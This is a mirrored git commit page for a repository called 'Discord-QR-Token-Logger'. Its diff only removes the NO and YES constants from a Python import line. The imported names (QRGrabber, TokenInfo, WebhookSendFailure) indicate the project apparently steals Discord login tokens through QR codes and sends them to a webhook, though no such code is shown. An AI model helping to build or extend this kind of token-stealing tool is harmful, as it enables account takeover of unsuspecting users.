mirror of
https://github.com/9P9/Discord-QR-Token-Logger.git
synced 2025-06-13 14:05:13 +00:00
Removed the NO and YES
This commit is contained in:
parent
5313e150a6
commit
4fd98c4384
@ -30,7 +30,7 @@ from pystyle import Box, Center, Colorate, Colors, System, Write
|
||||
from selenium import webdriver
|
||||
from selenium.common.exceptions import WebDriverException
|
||||
from selenium.webdriver.chrome.service import Service
|
||||
from constants import BANNER, NO, PYSTRAY_IMG, YES, SLEEP_TIME
|
||||
from constants import BANNER, PYSTRAY_IMG, SLEEP_TIME
|
||||
from discord_token import QRGrabber, TokenInfo
|
||||
from exceptions import InvalidToken, QRCodeNotFound, WebhookSendFailure
|
||||
from queue import Queue
|
||||
|
Loading…
x
Reference in New Issue
Block a user